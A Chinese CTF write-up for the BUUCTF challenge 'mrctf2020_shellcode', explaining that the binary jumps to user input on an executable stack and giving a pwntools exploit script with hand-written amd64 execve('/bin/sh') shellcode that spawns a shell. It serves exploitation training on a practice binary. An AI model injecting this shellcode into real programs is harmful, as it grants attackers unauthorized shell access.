BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
睡不醒的kun5 小时前
定长滑动窗口-基础篇(2)
数据结构·c++·算法·leetcode·职场和发展·滑动窗口·定长滑动窗口
fie88895 小时前
基于MATLAB的可见光通信(VLC)系统仿真
开发语言·matlab
小王努力学编程5 小时前
LangChain——AI应用开发框架(核心组件1)
linux·服务器·前端·数据库·c++·人工智能·langchain
写代码的【黑咖啡】5 小时前
Python中的lxml:高效XML处理库
xml·开发语言·python
黎雁·泠崖5 小时前
Java字符串高阶:底层原理深剖+经典面试题全解
java·开发语言
txzrxz5 小时前
单调栈详解(含题目)
数据结构·c++·算法·前缀和·单调栈
清风~徐~来5 小时前
【视频点播系统】环境搭建
开发语言
重生之我是Java开发战士5 小时前
【Java SE】反射、枚举与Lambda表达式
java·开发语言
weixin_436525075 小时前
若依多租户版 - @ApiEncrypt, api接口加密
java·开发语言
superman超哥5 小时前
序列化格式的灵活切换:Serde 生态的统一抽象力量
开发语言·rust·编程语言·rust serde·序列化格式·rust序列化格式